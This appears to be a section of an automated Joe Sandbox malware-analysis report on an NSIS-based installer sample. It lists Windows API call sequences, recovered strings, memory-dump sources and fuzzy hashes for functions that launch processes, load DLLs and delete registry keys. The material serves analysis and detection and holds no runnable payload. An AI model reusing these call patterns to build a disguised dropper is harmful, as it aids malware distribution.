                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                    • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00055C00,00000064,00117D56), ref: 00403295
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(0069E0D0), ref: 00402387
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                                                                                                                                                    • API String ID: 1459762280-1711415406
                                                                                                                                                                                                                                                                                                    • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(0069E0D0), ref: 00402387
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
